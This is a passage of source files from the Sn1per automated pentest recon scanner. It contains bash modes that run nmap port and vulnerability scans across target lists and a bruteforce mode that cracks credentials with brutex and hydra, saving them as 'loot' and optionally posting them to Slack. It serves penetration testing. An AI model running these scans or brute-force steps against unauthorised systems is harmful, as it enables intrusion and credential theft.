| } 68 | }; 69 | 70 | var api = {}; 71 | 72 | api.render = function(url, file) { 73 | opts.file = file; 74 | 75 | page.open(url, function(status) { 76 | if (status !== "success") { 77 | if (page.failReason && page.failReason == '401') { 78 | // Specific 401 HTTP code hint 79 | phantom.exit(opts.httpAuthErrorCode); 80 | } else { 81 | // All other failures 82 | phantom.exit(1); 83 | } 84 | } else { 85 | forceRenderTimeout = setTimeout(renderAndExit, opts.maxTimeout); 86 | } 87 | }); 88 | }; 89 | 90 | function renderAndExit() { 91 | // Trick to avoid transparent background 92 | page.evaluate(function() { 93 | document.body.bgColor = 'white'; 94 | }); 95 | 96 | page.render(opts.file); 97 | phantom.exit(0); 98 | } 99 | 100 | function noop() {} 101 | 102 | return api; 103 | }); 104 | 105 | function main() { 106 | 107 | var system = require('system'); 108 | var p_url = new RegExp('url_capture=(.*)'); 109 | var p_outfile = new RegExp('output_file=(.*)'); 110 | var p_header = new RegExp('header=(.*)'); 111 | 112 | var p_http_username = new RegExp('http_username=(.*)'); 113 | var http_username = ''; 114 | 115 | var p_http_password = new RegExp('http_password=(.*)'); 116 | var http_password = ''; 117 | 118 | var temp_custom_headers = { 119 | // Nullify Accept-Encoding header to disable compression (https://github.com/ariya/phantomjs/issues/10930) 120 | 'Accept-Encoding': ' ' 121 | }; 122 | 123 | for(var i = 0; i < system.args.length; i++) { 124 | if (p_url.test(system.args[i]) === true) 125 | { 126 | var URL = p_url.exec(system.args[i])[1]; 127 | } 128 | 129 | if (p_outfile.test(system.args[i]) === true) 130 | { 131 | var output_file = p_outfile.exec(system.args[i])[1]; 132 | } 133 | 134 | if (p_http_username.test(system.args[i]) === true) 135 | { 136 | http_username = p_http_username.exec(system.args[i])[1]; 137 | } 138 | 139 | if (p_http_password.test(system.args[i]) === true) 140 | { 141 | http_password = p_http_password.exec(system.args[i])[1]; 142 | } 143 | 144 | if (p_header.test(system.args[i]) === true) 145 | { 146 | var header = p_header.exec(system.args[i]); 147 | var p_header_split = header[1].split(': ', 2); 148 | var header_name = p_header_split[0]; 149 | var header_value = p_header_split[1]; 150 | 151 | temp_custom_headers[header_name] = header_value; 152 | 153 | } 154 | } 155 | 156 | if (typeof(URL) === 'undefined' || URL.length == 0 || typeof(output_file) === 'undefined' || output_file.length == 0) { 157 | console.log("Usage: phantomjs [options] webscreenshot.js url_capture= output_file= [header= http_username= http_password=]"); 158 | console.log('Please specify an URL to capture and an output png filename !'); 159 | 160 | phantom.exit(1); 161 | } 162 | else { 163 | var page = Page(temp_custom_headers, http_username, http_password); 164 | page.render(URL, output_file); 165 | } 166 | } 167 | 168 | main(); -------------------------------------------------------------------------------- /docker-compose-blackarch.yml: -------------------------------------------------------------------------------- 1 | version: '3.9' 2 | 3 | x-logging: &default-logging 4 | options: 5 | max-size: "40m" 6 | max-file: "10" 7 | driver: json-file 8 | 9 | services: 10 | blackarch: 11 | container_name: blackarch 12 | build: 13 | context: . 14 | dockerfile: Dockerfile.blackarch 15 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.9' 2 | 3 | x-logging: &default-logging 4 | options: 5 | max-size: "40m" 6 | max-file: "10" 7 | driver: json-file 8 | 9 | services: 10 | kali-linux: 11 | container_name: kali-linux 12 | build: 13 | context: . 14 | dockerfile: Dockerfile 15 | -------------------------------------------------------------------------------- /loot/README.md: -------------------------------------------------------------------------------- 1 | # Sn1per - Automated Pentest Recon Scanner 2 | ![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.png) 3 | -------------------------------------------------------------------------------- /modes/airstrike.sh: -------------------------------------------------------------------------------- 1 | # AIRSTRIKE MODE ##################################################################################################### 2 | if [[ "$MODE" = "airstrike" ]]; then 3 | if [[ -z "$FILE" ]]; then 4 | logo 5 | echo "You need to specify a list of targets (ie. -f ) to scan." 6 | exit 7 | fi 8 | if [[ "$REPORT" = "1" ]]; then 9 | for a in `cat $FILE`; 10 | do 11 | if [[ "$AUTO_BRUTE" = "1" ]]; then 12 | args="$args -b" 13 | fi 14 | if [[ "$FULLNMAPSCAN" = "1" ]]; then 15 | args="$args -fp" 16 | fi 17 | if [[ "$OSINT" = "1" ]]; then 18 | args="$args -o" 19 | fi 20 | if [[ "$RECON" = "1" ]]; then 21 | args="$args -re" 22 | fi 23 | if [[ ! -z "$WORKSPACE" ]]; then 24 | args="$args -w $WORKSPACE" 25 | WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE 26 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" 27 | mkdir -p $WORKSPACE_DIR 2> /dev/null 28 | mkdir $WORKSPACE_DIR/domains 2> /dev/null 29 | mkdir $WORKSPACE_DIR/screenshots 2> /dev/null 30 | mkdir $WORKSPACE_DIR/nmap 2> /dev/null 31 | mkdir $WORKSPACE_DIR/notes 2> /dev/null 32 | mkdir $WORKSPACE_DIR/reports 2> /dev/null 33 | mkdir $WORKSPACE_DIR/output 2> /dev/null 34 | fi 35 | args="$args -m stealth --noreport --noloot" 36 | TARGET="$a" 37 | args="$args -t $TARGET" 38 | echo -e "$OKRED |" 39 | echo -e "$OKRED | |" 40 | echo -e "$OKRED | -/_\-" 41 | echo -e "$OKRED -/_\- ______________(/ . \)______________" 42 | echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" 43 | echo -e "$OKRED <> \___/ <> <>" 44 | echo -e "$OKRED " 45 | echo -e "$OKRED ||" 46 | echo -e "$OKRED <>" 47 | echo -e "$OKRED ||" 48 | echo -e "$OKRED <>" 49 | echo -e "$OKRED ||" 50 | echo -e "$OKRED || BIG" 51 | echo -e "$OKRED _____ __ <> (^)))^ BOOM!" 52 | echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" 53 | echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" 54 | echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" 55 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" 56 | echo -e "$OKRED | ||. | | | ||| |||||" 57 | echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" 58 | echo -e "$OKRED | ||. | | | ||| |||||" 59 | echo -e "$OKRED __________________________________________________________" 60 | echo -e "$RESET" 61 | if [[ ! -z "$WORKSPACE_DIR" ]]; then 62 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 63 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 64 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 65 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 66 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 67 | fi 68 | sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 69 | else 70 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 71 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt 72 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 73 | fi 74 | args="" 75 | done 76 | fi 77 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 78 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 79 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 80 | fi 81 | if [[ "$LOOT" = "1" ]]; then 82 | loot 83 | fi 84 | exit 85 | fi 86 | -------------------------------------------------------------------------------- /modes/bruteforce.sh: -------------------------------------------------------------------------------- 1 | if [[ "$AUTO_BRUTE" = "1" ]]; then 2 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_bruteforce.txt 2> /dev/null 3 | ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 4 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 5 | echo -e "$OKRED RUNNING BRUTE FORCE $RESET" 6 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 7 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 8 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 9 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 10 | fi 11 | brutex $TARGET | tee $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null 12 | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null > $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null 13 | rm -f $LOOT_DIR/credentials/brutex-$TARGET 14 | cd $INSTALL_DIR 15 | rm -f hydra.restore 16 | rm -f scan.log 17 | CRACKED=$(egrep -h -i -s password $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null | grep host 2> /dev/null) 18 | if [[ ${#CRACKED} -ge 5 ]]; then 19 | echo "$CRACKED" > $LOOT_DIR/output/cracked-$TARGET.txt 2> /dev/null 20 | fi 21 | echo "" 22 | rm -f $LOOT_DIR/scans/running_${TARGET}_bruteforce.txt 2> /dev/null 23 | ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 24 | 25 | if [[ "$SLACK_NOTIFICATIONS_BRUTEFORCE" == "1" ]]; then 26 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/credentials/brutex-$TARGET.txt" 27 | fi 28 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 29 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 30 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per brute force: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 31 | fi 32 | else 33 | echo -e "$OKORANGE + -- --=[ AUTO_BRUTE setting disabled in sniper.conf... skipping.$RESET" 34 | fi -------------------------------------------------------------------------------- /modes/discover.sh: -------------------------------------------------------------------------------- 1 | # DISCOVER MODE ##################################################################################################### 2 | if [[ "$MODE" = "discover" ]]; then 3 | if [[ "$REPORT" = "1" ]]; then 4 | if [[ ! -z "$WORKSPACE" ]]; then 5 | WORKSPACE="$(echo $WORKSPACE | tr / -)" 6 | args="$args -w $WORKSPACE" 7 | LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE 8 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" 9 | mkdir -p $LOOT_DIR 2> /dev/null 10 | mkdir $LOOT_DIR/ips 2> /dev/null 11 | mkdir $LOOT_DIR/screenshots 2> /dev/null 12 | mkdir $LOOT_DIR/nmap 2> /dev/null 13 | mkdir $LOOT_DIR/notes 2> /dev/null 14 | mkdir $LOOT_DIR/reports 2> /dev/null 15 | mkdir $LOOT_DIR/output 2> /dev/null 16 | mkdir $LOOT_DIR/scans 2> /dev/null 17 | fi 18 | OUT_FILE="$(echo $TARGET | tr / -)" 19 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 20 | echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUT_FILE-$MODE.txt 2> /dev/null 21 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 22 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 23 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 24 | fi 25 | sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 26 | exit 27 | fi 28 | echo -e "$OKRED ____ /\\" 29 | echo -e "$OKRED Sn1per by @xer0dayz @Sn1perSecurity \ \\" 30 | echo -e "$OKRED https://sn1persecurity.com \ \\" 31 | echo -e "$OKRED ___ / \\" 32 | echo -e "$OKRED \ \\" 33 | echo -e "$OKRED === > [ \\" 34 | echo -e "$OKRED / \ \\" 35 | echo -e "$OKRED \ / /" 36 | echo -e "$OKRED === > [ /" 37 | echo -e "$OKRED / /" 38 | echo -e "$OKRED ___ \ /" 39 | echo -e "$OKRED / /" 40 | echo -e "$OKRED ____ / /" 41 | echo -e "$OKRED \/$RESET" 42 | echo "" 43 | OUT_FILE=$(echo $TARGET | tr / -) 44 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 45 | echo -e "$OKRED RUNNING PING DISCOVERY SCAN $RESET" 46 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 47 | nmap -n -sP $TARGET | tee $LOOT_DIR/ips/sniper-$OUT_FILE-ping.txt 48 | cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping.txt 2> /dev/null | grep "scan report" | awk '{print $5}' > $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt 49 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 50 | echo -e "$OKRED RUNNING TCP PORT SCAN $RESET" 51 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 52 | nmap -n -v -p $QUICK_PORTS $NMAP_OPTIONS -sS $TARGET -Pn 2> /dev/null | grep "open port" | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null 53 | cat $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt 54 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 55 | echo -e "$OKRED RUNNING UDP PORT SCAN $RESET" 56 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 57 | nmap -n -v -p $DEFAULT_UDP_PORTS $NMAP_OPTIONS -sU -Pn $TARGET 2> /dev/null | grep "open port" | tee $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt 2>/dev/null 58 | cat $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt 59 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 60 | echo -e "$OKRED CURRENT TARGETS $RESET" 61 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 62 | cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt 2> /dev/null > $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt 63 | sort -u $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt > $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt 64 | cat $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt 65 | echo "" 66 | echo -e "$OKRED[+]$RESET Target list saved to $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt " 67 | echo -e "$OKRED[i] To scan all IP's, use sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE $RESET" 68 | source $INSTALL_DIR/modes/sc0pe.sh 69 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 70 | echo -e "$OKRED SCAN COMPLETE! $RESET" 71 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 72 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 73 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 74 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 75 | fi 76 | sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE 77 | exit 78 | fi -------------------------------------------------------------------------------- /modes/fullportonly.sh: -------------------------------------------------------------------------------- 1 | # FULLPORTONLY MODE 2 | if [[ "$MODE" = "fullportonly" ]]; then 3 | if [[ "$REPORT" = "1" ]]; then 4 | args="-t $TARGET" 5 | if [[ ! -z "$WORKSPACE" ]]; then 6 | args="$args -w $WORKSPACE" 7 | LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE 8 | echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" 9 | mkdir -p $LOOT_DIR 2> /dev/null 10 | mkdir $LOOT_DIR/domains 2> /dev/null 11 | mkdir $LOOT_DIR/screenshots 2> /dev/null 12 | mkdir $LOOT_DIR/nmap 2> /dev/null 13 | mkdir $LOOT_DIR/notes 2> /dev/null 14 | mkdir $LOOT_DIR/reports 2> /dev/null 15 | mkdir $LOOT_DIR/scans 2> /dev/null 16 | mkdir $LOOT_DIR/output 2> /dev/null 17 | fi 18 | args="$args --noreport -m fullportonly" 19 | echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null 20 | echo "sniper -t $TARGET -m $MODE --noreport " >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 21 | ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 22 | sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 23 | exit 24 | fi 25 | logo 26 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 27 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 28 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 29 | fi 30 | echo "$TARGET" >> $LOOT_DIR/domains/targets.txt 31 | if [[ -f "/usr/share/sniper/pro/.portscanner.conf" ]]; then 32 | source /usr/share/sniper/pro/.portscanner.conf 33 | fi 34 | if [[ -z "$PORT" ]]; then 35 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 36 | echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET" 37 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 38 | nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET 39 | sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null 40 | rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null 41 | xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null 42 | else 43 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 44 | echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET" 45 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 46 | nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET 47 | sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null 48 | rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null 49 | xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null 50 | fi 51 | cp -f $LOOT_DIR/nmap/nmapreport-$TARGET.html $LOOT_DIR/nmap/nmapreport-$TARGET-`date +"%Y-%m-%d-%H-%M"`.html 2> /dev/null 52 | echo "$TARGET" >> $LOOT_DIR/scans/updated.txt 53 | rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null 54 | ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 55 | HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null) 56 | if [[ ${#HOST_UP} -ge 2 ]]; then 57 | echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null 58 | fi 59 | sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null 60 | mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null 61 | for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do 62 | echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt 63 | done 64 | diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null 65 | cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null 66 | cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null 67 | if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then 68 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt" 69 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt" 70 | fi 71 | if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then 72 | echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 73 | cat $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 74 | if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then 75 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 76 | /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff" 77 | fi 78 | fi 79 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 80 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 81 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 82 | fi 83 | if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then 84 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 85 | echo -e "$OKRED RUNNING SC0PE PASSIVE WEB VULNERABILITY SCAN $RESET" 86 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 87 | SSL="false" 88 | PORT="80" 89 | source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh 90 | SSL="true" 91 | PORT="443" 92 | source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh 93 | for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do 94 | source $file 95 | done 96 | source $INSTALL_DIR/modes/sc0pe-network-scan.sh 97 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 98 | source $INSTALL_DIR/modes/sc0pe.sh 99 | fi 100 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 101 | echo -e "$OKRED SCAN COMPLETE! $RESET" 102 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 103 | loot 104 | exit 105 | fi 106 | 107 | if [[ "$MODE" = "port" ]]; then 108 | if [[ -z "$PORT" ]]; then 109 | echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET" 110 | exit 111 | fi 112 | fi 113 | -------------------------------------------------------------------------------- /modes/fullportscan.sh: -------------------------------------------------------------------------------- 1 | if [[ "$FULLNMAPSCAN" = "0" ]]; then 2 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 3 | echo -e "$OKRED SKIPPING FULL NMAP PORT SCAN $RESET" 4 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 5 | else 6 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 7 | echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET" 8 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 9 | echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 10 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 11 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per full portscan: 